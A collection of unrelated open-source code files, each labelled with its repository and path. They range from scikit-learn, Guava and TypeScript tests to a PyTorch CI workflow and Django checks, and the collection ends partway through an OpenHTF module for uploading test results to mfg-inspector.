[(np.float32, np.float32), (np.float64, np.float64), (int, np.float64)],
)
def test_transformer_dtypes_casting(dtype_in, dtype_out):
X = Xdigits[:100].astype(dtype_in)
rbm = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
Xt = rbm.fit_transform(X)
# dtype_in and dtype_out should be consistent
assert Xt.dtype == dtype_out, "transform dtype: {} - original dtype: {}".format(
Xt.dtype, X.dtype
)
def test_convergence_dtype_consistency():
# float 64 transformer
X_64 = Xdigits[:100].astype(np.float64)
rbm_64 = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
Xt_64 = rbm_64.fit_transform(X_64)
# float 32 transformer
X_32 = Xdigits[:100].astype(np.float32)
rbm_32 = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
Xt_32 = rbm_32.fit_transform(X_32)
# results and attributes should be close enough in 32 bit and 64 bit
assert_allclose(Xt_64, Xt_32, rtol=1e-06, atol=0)
assert_allclose(
rbm_64.intercept_hidden_, rbm_32.intercept_hidden_, rtol=1e-06, atol=0
)
assert_allclose(
rbm_64.intercept_visible_, rbm_32.intercept_visible_, rtol=1e-05, atol=0
)
assert_allclose(rbm_64.components_, rbm_32.components_, rtol=1e-03, atol=0)
assert_allclose(rbm_64.h_samples_, rbm_32.h_samples_)
@pytest.mark.parametrize("method", ["fit", "partial_fit"])
def test_feature_names_out(method):
"""Check `get_feature_names_out` for `BernoulliRBM`."""
n_components = 10
rbm = BernoulliRBM(n_components=n_components)
getattr(rbm, method)(Xdigits)
names = rbm.get_feature_names_out()
expected_names = [f"bernoullirbm{i}" for i in range(n_components)]
assert_array_equal(expected_names, names) | python | github | https://github.com/scikit-learn/scikit-learn | sklearn/neural_network/tests/test_rbm.py |
// Code generated - EDITING IS FUTILE. DO NOT EDIT.
package v0alpha1
// +k8s:openapi-gen=true
type DummystatusOperatorState struct {
// lastEvaluation is the ResourceVersion last evaluated
LastEvaluation string `json:"lastEvaluation"`
// state describes the state of the lastEvaluation.
// It is limited to three possible states for machine evaluation.
State DummyStatusOperatorStateState `json:"state"`
// descriptiveState is an optional more descriptive state field which has no requirements on format
DescriptiveState *string `json:"descriptiveState,omitempty"`
// details contains any extra information that is operator-specific
Details map[string]interface{} `json:"details,omitempty"`
}
// NewDummystatusOperatorState creates a new DummystatusOperatorState object.
func NewDummystatusOperatorState() *DummystatusOperatorState {
return &DummystatusOperatorState{}
}
// OpenAPIModelName returns the OpenAPI model name for DummystatusOperatorState.
func (DummystatusOperatorState) OpenAPIModelName() string {
return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummystatusOperatorState"
}
// +k8s:openapi-gen=true
type DummyStatus struct {
// operatorStates is a map of operator ID to operator state evaluations.
// Any operator which consumes this kind SHOULD add its state evaluation information to this field.
OperatorStates map[string]DummystatusOperatorState `json:"operatorStates,omitempty"`
// additionalFields is reserved for future use
AdditionalFields map[string]interface{} `json:"additionalFields,omitempty"`
}
// NewDummyStatus creates a new DummyStatus object.
func NewDummyStatus() *DummyStatus {
return &DummyStatus{}
}
// OpenAPIModelName returns the OpenAPI model name for DummyStatus.
func (DummyStatus) OpenAPIModelName() string {
return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummyStatus"
}
// +k8s:openapi-gen=true
type DummyStatusOperatorStateState string
const (
DummyStatusOperatorStateStateSuccess DummyStatusOperatorStateState = "success"
DummyStatusOperatorStateStateInProgress DummyStatusOperatorStateState = "in_progress"
DummyStatusOperatorStateStateFailed DummyStatusOperatorStateState = "failed"
)
// OpenAPIModelName returns the OpenAPI model name for DummyStatusOperatorStateState.
func (DummyStatusOperatorStateState) OpenAPIModelName() string {
return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummyStatusOperatorStateState"
} | go | github | https://github.com/grafana/grafana | apps/alerting/historian/pkg/apis/alertinghistorian/v0alpha1/dummy_status_gen.go |
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.hash;
import static com.google.common.hash.Hashing.ChecksumType.ADLER_32;
import static com.google.common.hash.Hashing.ChecksumType.CRC_32;
import java.util.zip.Checksum;
import junit.framework.TestCase;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for ChecksumHashFunction.
*
* @author Colin Decker
*/
@NullUnmarked
public class ChecksumHashFunctionTest extends TestCase {
public void testCrc32_equalsChecksumValue() throws Exception {
assertChecksum(CRC_32, "");
assertChecksum(CRC_32, "Z");
assertChecksum(CRC_32, "foobar");
}
public void testAdler32_equalsChecksumValue() throws Exception {
assertChecksum(ADLER_32, "");
assertChecksum(ADLER_32, "Z");
assertChecksum(ADLER_32, "foobar");
}
public void testCrc32_knownValues() throws Exception {
assertHash32(0x1C8600E3, CRC_32, "hell");
assertHash32(0x3610A686, CRC_32, "hello");
assertHash32(0xED81F9F6, CRC_32, "hello ");
assertHash32(0x4850DDC2, CRC_32, "hello w");
assertHash32(0x7A2D6005, CRC_32, "hello wo");
assertHash32(0x1C192672, CRC_32, "hello wor");
assertHash32(0x414FA339, CRC_32, "The quick brown fox jumps over the lazy dog");
assertHash32(0x4400B5BC, CRC_32, "The quick brown fox jumps over the lazy cog");
}
public void testAdler32_knownValues() throws Exception {
assertHash32(0x041701A6, ADLER_32, "hell");
assertHash32(0x062C0215, ADLER_32, "hello");
assertHash32(0x08610235, ADLER_32, "hello ");
assertHash32(0x0B0D02AC, ADLER_32, "hello w");
assertHash32(0x0E28031B, ADLER_32, "hello wo");
assertHash32(0x11B5038D, ADLER_32, "hello wor");
assertHash32(0x5BDC0FDA, ADLER_32, "The quick brown fox jumps over the lazy dog");
assertHash32(0x5BD90FD9, ADLER_32, "The quick brown fox jumps over the lazy cog");
}
private static void assertChecksum(ImmutableSupplier<Checksum> supplier, String input) {
byte[] bytes = HashTestUtils.ascii(input);
Checksum checksum = supplier.get();
checksum.update(bytes, 0, bytes.length);
long value = checksum.getValue();
String toString = "name";
HashFunction func = new ChecksumHashFunction(supplier, 32, toString);
assertEquals(toString, func.toString());
assertEquals(value, func.hashBytes(bytes).padToLong());
}
private static void assertHash32(
int expected, ImmutableSupplier<Checksum> supplier, String input) {
byte[] bytes = HashTestUtils.ascii(input);
String toString = "name";
HashFunction func = new ChecksumHashFunction(supplier, 32, toString);
assertEquals(expected, func.hashBytes(bytes).asInt());
assertEquals(toString, func.toString());
}
} | java | github | https://github.com/google/guava | android/guava-tests/test/com/google/common/hash/ChecksumHashFunctionTest.java |
from __future__ import unicode_literals
from django.db import models
def check_test_runner():
"""
Checks if the user has *not* overridden the ``TEST_RUNNER`` setting &
warns them about the default behavior changes.
If the user has overridden that setting, we presume they know what they're
doing & avoid generating a message.
"""
from django.conf import settings
new_default = 'django.test.runner.DiscoverRunner'
test_runner_setting = getattr(settings, 'TEST_RUNNER', new_default)
if test_runner_setting == new_default:
message = [
"Django 1.6 introduced a new default test runner ('%s')" % new_default,
"You should ensure your tests are all running & behaving as expected. See",
"https://docs.djangoproject.com/en/dev/releases/1.6/#new-test-runner",
"for more information.",
]
return ' '.join(message)
def check_boolean_field_default_value():
"""
Checks if there are any BooleanFields without a default value, &
warns the user that the default has changed from False to Null.
"""
fields = []
for cls in models.get_models():
opts = cls._meta
for f in opts.local_fields:
if isinstance(f, models.BooleanField) and not f.has_default():
fields.append(
'%s.%s: "%s"' % (opts.app_label, opts.object_name, f.name)
)
if fields:
fieldnames = ", ".join(fields)
message = [
"You have not set a default value for one or more BooleanFields:",
"%s." % fieldnames,
"In Django 1.6 the default value of BooleanField was changed from",
"False to Null when Field.default isn't defined. See",
"https://docs.djangoproject.com/en/1.6/ref/models/fields/#booleanfield",
"for more information.",
]
return ' '.join(message)
def run_checks():
"""
Required by the ``check`` management command, this returns a list of
messages from all the relevant check functions for this version of Django.
"""
checks = [
check_test_runner(),
check_boolean_field_default_value(),
]
# Filter out the ``None`` or empty strings.
return [output for output in checks if output] | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/conformance/es6/computedProperties/computedPropertyNames2_ES5.ts] ////
//// [computedPropertyNames2_ES5.ts]
var methodName = "method";
var accessorName = "accessor";
class C {
[methodName]() { }
static [methodName]() { }
get [accessorName]() { }
set [accessorName](v) { }
static get [accessorName]() { }
static set [accessorName](v) { }
}
//// [computedPropertyNames2_ES5.js]
"use strict";
var methodName = "method";
var accessorName = "accessor";
class C {
[methodName]() { }
static [methodName]() { }
get [accessorName]() { }
set [accessorName](v) { }
static get [accessorName]() { }
static set [accessorName](v) { }
} | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/computedPropertyNames2_ES5(target=es2015).js |
#!/usr/bin/env python
import roslib; #roslib.load_manifest('smach_tutorials')
import rospy
import smach
import smach_ros
# define state Foo
class Foo(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['outcome1','outcome2'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('Executing state FOO')
rospy.sleep(1)
if self.counter < 10:
self.counter += 1
return 'outcome1'
else:
return 'outcome2'
# define state Bar
class Bar(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['outcome2'])
def execute(self, userdata):
rospy.loginfo('Executing state BAR')
rospy.sleep(1)
return 'outcome2'
# main
def main():
rospy.init_node('smach_example_state_machine')
# Create a SMACH state machine
sm = smach.StateMachine(outcomes=['outcome4', 'outcome5'])
# Open the container
with sm:
# Add states to the container
smach.StateMachine.add('FOO', Foo(),
transitions={'outcome1':'BAR',
'outcome2':'outcome4'})
smach.StateMachine.add('BAR', Bar(),
transitions={'outcome2':'FOO'})
# Create and start the introspection server
sis = smach_ros.IntrospectionServer('server_name', sm, '/SM_ROOT')
sis.start()
# Execute SMACH plan
outcome = sm.execute()
# Wait for ctrl-c to stop the application
print "Test FSM done, waiting until ctrl+c is hit..."
rospy.spin()
sis.stop()
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
name: linux-test
inputs:
build-environment:
required: true
type: string
description: Top-level label for what's being built/tested.
test-matrix:
required: true
type: string
description: JSON description of what test configs to run.
docker-image:
required: true
type: string
description: Docker image to run in.
sync-tag:
required: false
type: string
default: ""
description: |
If this is set, our linter will use this to make sure that every other
job with the same `sync-tag` is identical.
use-gha:
required: false
type: string
default: ""
description: If set to any value, upload to GHA. Otherwise upload to S3.
dashboard-tag:
required: false
type: string
default: ""
s3-bucket:
description: S3 bucket to download artifact
required: false
type: string
default: "gha-artifacts"
aws-role-to-assume:
description: role to assume for downloading artifacts
required: false
type: string
default: ""
HUGGING_FACE_HUB_TOKEN:
description: |
HF Auth token to avoid rate limits when downloading models or datasets from hub
required: false
default: ""
GITHUB_TOKEN:
description: GitHub token
required: true
disable-monitor:
description: |
[Experimental] Disable utilization monitoring for tests.
Currently, by default we disable the monitor job and only look for specific tests,
since we are investigating the behaviour of the monitor script with different tests.
required: false
type: boolean
default: true
#env:
# GIT_DEFAULT_BRANCH: ${{ inputs.default_branch }}
runs:
using: composite
steps:
- name: Setup Linux
uses: ./.github/actions/setup-linux
- name: Login to ECR
uses: ./.github/actions/ecr-login
with:
aws-role-to-assume: ${{ inputs.aws-role-to-assume }}
- name: Calculate docker image
id: calculate-docker-image
uses: pytorch/test-infra/.github/actions/calculate-docker-image@main
with:
docker-image-name: ${{ inputs.docker-image }}
- name: Use following to pull public copy of the image
id: print-ghcr-mirror
env:
ECR_DOCKER_IMAGE: ${{ steps.calculate-docker-image.outputs.docker-image }}
shell: bash
run: |
tag=${ECR_DOCKER_IMAGE##*/}
echo "docker pull ghcr.io/pytorch/ci-image:${tag/:/-}"
- name: Pull docker image
uses: pytorch/test-infra/.github/actions/pull-docker-image@main
with:
docker-image: ${{ steps.calculate-docker-image.outputs.docker-image }}
- name: Check if in a container runner
shell: bash
id: check_container_runner
run: echo "IN_CONTAINER_RUNNER=$(if [ -f /.inarc ] || [ -f /.incontainer ]; then echo true ; else echo false; fi)" >> "$GITHUB_OUTPUT"
- name: Install nvidia driver, nvidia-docker runtime, set GPU_FLAG
id: install-nvidia-driver
uses: pytorch/test-infra/.github/actions/setup-nvidia@main
if: ${{ contains(inputs.build-environment, 'cuda') && !contains(matrix.config, 'nogpu') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false' }}
- name: Setup GPU_FLAG for docker run
id: setup-gpu-flag
run: echo "GPU_FLAG=--gpus all -e NVIDIA_DRIVER_CAPABILITIES=all" >> "${GITHUB_ENV}"
if: ${{ contains(inputs.build-environment, 'cuda') && !contains(matrix.config, 'nogpu') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'true' }}
- name: Setup SCCACHE_SERVER_PORT environment for docker run when on container
id: setup-sscache-port-flag
run: echo "SCCACHE_SERVER_PORT_DOCKER_FLAG=-e SCCACHE_SERVER_PORT=$((RUNNER_UID + 4226))" >> "${GITHUB_ENV}"
if: ${{ steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'true' }}
- name: Lock NVIDIA A100 40GB Frequency
shell: bash
run: |
sudo nvidia-smi -pm 1
sudo nvidia-smi -ac 1215,1410
nvidia-smi
if: ${{ contains(matrix.runner, 'a100') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false' }}
- name: Start monitoring script
id: monitor-script
if: ${{ !inputs.disable-monitor }}
shell: bash
continue-on-error: true
run: |
python3 -m pip install psutil==5.9.8 nvidia-ml-py==11.525.84
python3 -m tools.stats.monitor > usage_log.txt 2>&1 &
echo "monitor-script-pid=${!}" >> "${GITHUB_OUTPUT}"
- name: Download build artifacts
uses: ./.github/actions/download-build-artifacts
with:
name: ${{ inputs.build-environment }}
s3-bucket: ${{ inputs.s3-bucket }}
- name: Download TD artifacts
continue-on-error: true
uses: ./.github/actions/download-td-artifacts
- name: Parse ref
id: parse-ref
shell: bash
run: .github/scripts/parse_ref.py
- name: Get workflow job id
id: get-job-id
uses: ./.github/actions/get-workflow-job-id
if: always()
with:
github-token: ${{ inputs.GITHUB_TOKEN }}
- name: Check for keep-going label and re-enabled test issues
# This uses the filter-test-configs action because it conveniently
# checks for labels and re-enabled test issues. It does not actually do
# any filtering. All filtering is done in the build step.
id: keep-going
uses: ./.github/actions/filter-test-configs
with:
github-token: ${{ inputs.GITHUB_TOKEN }}
test-matrix: ${{ inputs.test-matrix }}
job-name: ${{ steps.get-job-id.outputs.job-name }}
- name: Test
id: test
env:
BUILD_ENVIRONMENT: ${{ inputs.build-environment }}
PR_NUMBER: ${{ github.event.pull_request.number }}
GITHUB_REPOSITORY: ${{ github.repository }}
GITHUB_WORKFLOW: ${{ github.workflow }}
GITHUB_JOB: ${{ github.job }}
GITHUB_RUN_ID: ${{ github.run_id }}
GITHUB_RUN_NUMBER: ${{ github.run_number }}
GITHUB_RUN_ATTEMPT: ${{ github.run_attempt }}
JOB_ID: ${{ steps.get-job-id.outputs.job-id }}
JOB_NAME: ${{ steps.get-job-id.outputs.job-name }}
BRANCH: ${{ steps.parse-ref.outputs.branch }}
SHA1: ${{ github.event.pull_request.head.sha || github.sha }}
BASE_SHA: ${{ github.event.pull_request.base.sha || github.sha }}
TEST_CONFIG: ${{ matrix.config }}
SHARD_NUMBER: ${{ matrix.shard }}
NUM_TEST_SHARDS: ${{ matrix.num_shards }}
REENABLED_ISSUES: ${{ steps.keep-going.outputs.reenabled-issues }}
CONTINUE_THROUGH_ERROR: ${{ steps.keep-going.outputs.keep-going }}
VERBOSE_TEST_LOGS: ${{ steps.keep-going.outputs.ci-verbose-test-logs }}
TEST_SHOWLOCALS: ${{ steps.keep-going.outputs.ci-test-showlocals }}
NO_TEST_TIMEOUT: ${{ steps.keep-going.outputs.ci-no-test-timeout }}
NO_TD: ${{ steps.keep-going.outputs.ci-no-td }}
TD_DISTRIBUTED: ${{ steps.keep-going.outputs.ci-td-distributed }}
SCCACHE_BUCKET: ossci-compiler-cache-circleci-v2
SCCACHE_REGION: us-east-1
SCCACHE_S3_KEY_PREFIX: ${{ github.workflow }}
SHM_SIZE: ${{ contains(inputs.build-environment, 'cuda') && '2g' || '1g' }}
DOCKER_IMAGE: ${{ inputs.docker-image }}
XLA_CUDA: ${{ contains(inputs.build-environment, 'xla') && '0' || '' }}
XLA_CLANG_CACHE_S3_BUCKET_NAME: ossci-compiler-clang-cache-circleci-xla
PYTORCH_TEST_CUDA_MEM_LEAK_CHECK: ${{ matrix.mem_leak_check && '1' || '0' }}
PYTORCH_TEST_RERUN_DISABLED_TESTS: ${{ matrix.rerun_disabled_tests && '1' || '0' }}
DASHBOARD_TAG: ${{ inputs.dashboard-tag }}
HUGGING_FACE_HUB_TOKEN: ${{ inputs.HUGGING_FACE_HUB_TOKEN }}
SCRIBE_GRAPHQL_ACCESS_TOKEN: ${{ secrets.SCRIBE_GRAPHQL_ACCESS_TOKEN }}
IS_A100_RUNNER: ${{ contains(matrix.runner, 'a100') && '1' || '0' }}
shell: bash
run: |
set -x
if [[ $TEST_CONFIG == 'multigpu' ]]; then
TEST_COMMAND=.ci/pytorch/multigpu-test.sh
elif [[ $BUILD_ENVIRONMENT == *onnx* ]]; then
TEST_COMMAND=.ci/onnx/test.sh
else
TEST_COMMAND=.ci/pytorch/test.sh
fi
# detached container should get cleaned up by teardown_ec2_linux
# TODO: Stop building test binaries as part of the build phase
# Used for GPU_FLAG since that doesn't play nice
# shellcheck disable=SC2086,SC2090
container_name=$(docker run \
${GPU_FLAG:-} \
${SCCACHE_SERVER_PORT_DOCKER_FLAG:-} \
-e BUILD_ENVIRONMENT \
-e PR_NUMBER \
-e GITHUB_ACTIONS \
-e GITHUB_REPOSITORY \
-e GITHUB_WORKFLOW \
-e GITHUB_JOB \
-e GITHUB_RUN_ID \
-e GITHUB_RUN_NUMBER \
-e GITHUB_RUN_ATTEMPT \
-e JOB_ID \
-e JOB_NAME \
-e BASE_SHA \
-e BRANCH \
-e SHA1 \
-e AWS_DEFAULT_REGION \
-e IN_WHEEL_TEST \
-e SHARD_NUMBER \
-e TEST_CONFIG \
-e NUM_TEST_SHARDS \
-e REENABLED_ISSUES \
-e CONTINUE_THROUGH_ERROR \
-e VERBOSE_TEST_LOGS \
-e NO_TEST_TIMEOUT \
-e NO_TD \
-e TD_DISTRIBUTED \
-e PR_LABELS \
-e MAX_JOBS="$(nproc --ignore=2)" \
-e SCCACHE_BUCKET \
-e SCCACHE_REGION \
-e SCCACHE_S3_KEY_PREFIX \
-e XLA_CUDA \
-e XLA_CLANG_CACHE_S3_BUCKET_NAME \
-e PYTORCH_TEST_CUDA_MEM_LEAK_CHECK \
-e PYTORCH_TEST_RERUN_DISABLED_TESTS \
-e SKIP_SCCACHE_INITIALIZATION=1 \
-e HUGGING_FACE_HUB_TOKEN \
-e SCRIBE_GRAPHQL_ACCESS_TOKEN \
-e DASHBOARD_TAG \
-e IS_A100_RUNNER \
--env-file="/tmp/github_env_${GITHUB_RUN_ID}" \
--security-opt seccomp=unconfined \
--cap-add=SYS_PTRACE \
--ipc=host \
--shm-size="${SHM_SIZE}" \
--tty \
--detach \
--name="${container_name}" \
--user jenkins \
-v "${GITHUB_WORKSPACE}:/var/lib/jenkins/workspace" \
-w /var/lib/jenkins/workspace \
"${DOCKER_IMAGE}"
)
echo "DOCKER_CONTAINER_ID=${container_name}" >> "${GITHUB_ENV}"
docker exec -t "${container_name}" sh -c "pip install $(echo dist/*.whl)[opt-einsum] && ${TEST_COMMAND}"
- name: Upload pytest cache if tests failed
uses: ./.github/actions/pytest-cache-upload
continue-on-error: true
if: failure() && steps.test.conclusion && steps.test.conclusion == 'failure'
with:
cache_dir: .pytest_cache
shard: ${{ matrix.shard }}
sha: ${{ github.event.pull_request.head.sha || github.sha }}
test_config: ${{ matrix.config }}
job_identifier: ${{ github.workflow }}_${{ inputs.build-environment }}
- name: Print remaining test logs
shell: bash
if: always() && steps.test.conclusion
run: |
cat test/**/*_toprint.log || true
- name: Stop monitoring script
if: ${{ always() && steps.monitor-script.outputs.monitor-script-pid }}
shell: bash
continue-on-error: true
env:
MONITOR_SCRIPT_PID: ${{ steps.monitor-script.outputs.monitor-script-pid }}
run: |
kill "$MONITOR_SCRIPT_PID"
- name: Upload test artifacts
uses: ./.github/actions/upload-test-artifacts
if: always() && steps.test.conclusion && steps.test.conclusion != 'skipped'
with:
file-suffix: ${{ github.job }}-${{ matrix.config }}-${{ matrix.shard }}-${{ matrix.num_shards }}-${{ matrix.runner }}_${{ steps.get-job-id.outputs.job-id }}
use-gha: ${{ inputs.use-gha }}
s3-bucket: ${{ inputs.s3-bucket }}
- name: Collect backtraces from coredumps (if any)
if: always()
shell: bash
run: |
# shellcheck disable=SC2156
find . -iname "core.[1-9]*" -exec docker exec "${DOCKER_CONTAINER_ID}" sh -c "gdb python {} -ex 'bt' -ex 'q'" \;
- name: Store Core dumps on S3
uses: seemethere/upload-artifact-s3@v5
if: failure()
with:
name: coredumps-${{ matrix.config }}-${{ matrix.shard }}-${{ matrix.num_shards }}-${{ matrix.runner }}
retention-days: 14
if-no-files-found: ignore
path: ./**/core.[1-9]*
- name: Teardown Linux
uses: pytorch/test-infra/.github/actions/teardown-linux@main
if: always() && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false'
# NB: We are currently having an intermittent GPU-related issue on G5 runners with
# A10G GPU. Once this happens, trying to reset the GPU as done in setup-nvidia does
# not seem to help. Here are some symptoms:
# * Calling nvidia-smi timeouts after 60 second
# * Fail to run nvidia-smi with an unable to determine the device handle for GPU
# unknown error
# * Test fails with a missing CUDA GPU error when initializing CUDA in PyTorch
# * Run docker --gpus all fails with error response from daemon
#
# As both the root cause and recovery path are unclear, let's take the runner out of
# service so that it doesn't get any more jobs
- name: Check NVIDIA driver installation step
if: failure() && steps.install-nvidia-driver.outcome && steps.install-nvidia-driver.outcome != 'skipped'
shell: bash
env:
RUNNER_WORKSPACE: ${{ runner.workspace }}
run: |
set +e
set -x
nvidia-smi
# NB: Surprisingly, nvidia-smi command returns successfully with return code 0 even in
# the case where the driver has already crashed as it still can get the driver version
# and some basic information like the bus ID. However, the rest of the information
# would be missing (ERR!), for example:
#
# +-----------------------------------------------------------------------------+
# | NVIDIA-SMI 525.89.02 Driver Version: 525.89.02 CUDA Version: 12.0 |
# |-------------------------------+----------------------+----------------------+
# | GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
# | Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
# | | | MIG M. |
# |===============================+======================+======================|
# | 0 ERR! Off | 00000000:00:1E.0 Off | ERR! |
# |ERR! ERR! ERR! ERR! / ERR! | 4184MiB / 23028MiB | ERR! Default |
# | | | ERR! |
# +-------------------------------+----------------------+----------------------+
#
# +-----------------------------------------------------------------------------+
# | Processes: |
# | GPU GI CI PID Type Process name GPU Memory |
# | ID ID Usage |
# |=============================================================================|
# +-----------------------------------------------------------------------------+
#
# This should be reported as a failure instead as it will guarantee to fail when
# Docker tries to run with --gpus all
#
# So, the correct check here is to query one of the missing piece of info like
# GPU name, so that the command can fail accordingly
nvidia-smi --query-gpu=gpu_name --format=csv,noheader --id=0
NVIDIA_SMI_STATUS=$?
# These are acceptable return code from nvidia-smi as copied from setup-nvidia GitHub action
if [ "$NVIDIA_SMI_STATUS" -ne 0 ] && [ "$NVIDIA_SMI_STATUS" -ne 14 ]; then
echo "NVIDIA driver installation has failed, shutting down the runner..."
.github/scripts/stop_runner_service.sh
fi
# For runner with multiple GPUs, we also want to confirm that the number of GPUs are the
# power of 2, i.e. 1, 2, 4, or 8. This is to avoid flaky test issue when one GPU fails
# https://github.com/pytorch/test-infra/issues/4000
GPU_COUNT=$(nvidia-smi --list-gpus | wc -l)
NVIDIA_SMI_STATUS=$?
# These are acceptable return code from nvidia-smi as copied from setup-nvidia GitHub action
if [ "$NVIDIA_SMI_STATUS" -ne 0 ] && [ "$NVIDIA_SMI_STATUS" -ne 14 ]; then
echo "NVIDIA driver installation has failed, shutting down the runner..."
.github/scripts/stop_runner_service.sh
fi
# Check the GPU count to be a power of 2
if [ "$GPU_COUNT" -le 8 ] && [ "$GPU_COUNT" -ne 1 ] && [ "$GPU_COUNT" -ne 2 ] && [ "$GPU_COUNT" -ne 4 ] && [ "$GPU_COUNT" -ne 8 ]; then
echo "NVIDIA driver detects $GPU_COUNT GPUs. The runner has a broken GPU, shutting it down..."
.github/scripts/stop_runner_service.sh
fi | unknown | github | https://github.com/pytorch/pytorch | .github/actions/linux-test/action.yml |
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bundle\FrameworkBundle\DependencyInjection\Compiler;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Definition;
use Symfony\Component\DependencyInjection\Reference;
class AssetsContextPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container): void
{
if (!$container->hasDefinition('assets.context')) {
return;
}
if (!$container->hasDefinition('router.request_context')) {
$container->setParameter('asset.request_context.base_path', $container->getParameter('asset.request_context.base_path') ?? '');
$container->setParameter('asset.request_context.secure', $container->getParameter('asset.request_context.secure') ?? false);
return;
}
$context = $container->getDefinition('assets.context');
if (null === $container->getParameter('asset.request_context.base_path')) {
$context->replaceArgument(1, (new Definition('string'))->setFactory([new Reference('router.request_context'), 'getBaseUrl']));
}
if (null === $container->getParameter('asset.request_context.secure')) {
$context->replaceArgument(2, (new Definition('bool'))->setFactory([new Reference('router.request_context'), 'isSecure']));
}
}
} | php | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/DependencyInjection/Compiler/AssetsContextPass.php |
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/gpio/abilis,tb10x-gpio.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Abilis TB10x GPIO controller
maintainers:
- Christian Ruppert <christian.ruppert@abilis.com>
properties:
compatible:
const: abilis,tb10x-gpio
reg:
maxItems: 1
gpio-controller: true
'#gpio-cells':
const: 2
gpio-ranges: true
gpio-ranges-group-names: true
interrupt-controller: true
'#interrupt-cells':
const: 1
description: Interrupts are triggered on both edges
interrupts:
maxItems: 1
abilis,ngpio:
description: Number of GPIO pins this driver controls
$ref: /schemas/types.yaml#/definitions/uint32
required:
- compatible
- reg
- gpio-controller
- '#gpio-cells'
- abilis,ngpio
additionalProperties: false
examples:
- |
gpio@ff140000 {
compatible = "abilis,tb10x-gpio";
interrupt-controller;
#interrupt-cells = <1>;
interrupts = <27 2>;
reg = <0xff140000 0x1000>;
gpio-controller;
#gpio-cells = <2>;
abilis,ngpio = <3>;
gpio-ranges = <&iomux 0 0 0>;
gpio-ranges-group-names = "gpioa_pins";
}; | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/gpio/abilis,tb10x-gpio.yaml |
"""Output and/or upload a TestRun or MfgEvent proto for mfg-inspector.com.
"""
import json
import logging
import threading
import time
import zlib
import httplib2
import oauth2client.client
from openhtf.output import callbacks
from openhtf.output.proto import test_runs_converter
from openhtf.output.proto import guzzle_pb2
class UploadFailedError(Exception):
"""Raised when an upload to mfg-inspector fails."""
class InvalidTestRunError(Exception):
"""Raised if test run is invalid."""
def _send_mfg_inspector_request(envelope_data, credentials, destination_url):
"""Send upload http request. Intended to be run in retry loop."""
logging.info('Uploading result...')
http = httplib2.Http()
if credentials.access_token_expired:
credentials.refresh(http)
credentials.authorize(http)
resp, content = http.request(destination_url, 'POST', envelope_data)
try:
result = json.loads(content)
except Exception:
logging.debug('Upload failed with response %s: %s', resp, content)
raise UploadFailedError(resp, content)
if resp.status != 200:
logging.debug('Upload failed: %s', result)
raise UploadFailedError(result['error'], result)
return result
def send_mfg_inspector_data(inspector_proto, credentials, destination_url):
"""Upload MfgEvent to steam_engine."""
envelope = guzzle_pb2.TestRunEnvelope()
envelope.payload = zlib.compress(inspector_proto.SerializeToString())
envelope.payload_type = guzzle_pb2.COMPRESSED_MFG_EVENT
envelope_data = envelope.SerializeToString()
for _ in xrange(5):
try:
result = _send_mfg_inspector_request(
envelope_data, credentials, destination_url)
return result
except UploadFailedError:
time.sleep(1)
logging.critical(
'Could not upload to mfg-inspector after 5 attempts. Giving up.')
return {}
class _MemStorage(oauth2client.client.Storage):
# pylint: disable=invalid-name
"""Helper Storage class that keeps credentials in memory."""
def __init__(self):
self._lock = threading.Lock()
self._credentials = None
def acquire_lock(self):
self._lock.acquire(True)
def release_lock(self):
self._lock.release()
def locked_get(self):
return self._credentials
def locked_put(self, credentials):
self._credentials = credentials
class MfgInspector(object):
"""Interface to convert a TestRun to a mfg-inspector compatible proto.
Instances of this class are typically used to create callbacks that are
compatible with the OpenHTF output callbacks.
Typical usage:
interface = mfg_inspector.MfgInspector.from_json().set_converter(
my_custom_converter)
my_tester.add_output_callbacks(interface.save_to_disk(), interface.upload())
**Important** the conversion of the TestRecord to protofbuf as specified in
the _converter callable attribute only occurs once and the resulting protobuf
is cached in memory on the instance.
The upload callback will upload to mfg-inspector.com using the given
username and authentication key (which should be the key data itself, not a
filename or file).
In typical productin setups, we *first* save the protobuf to disk then attempt
to upload the protobuf to mfg-inspector. In the event of a network outage,
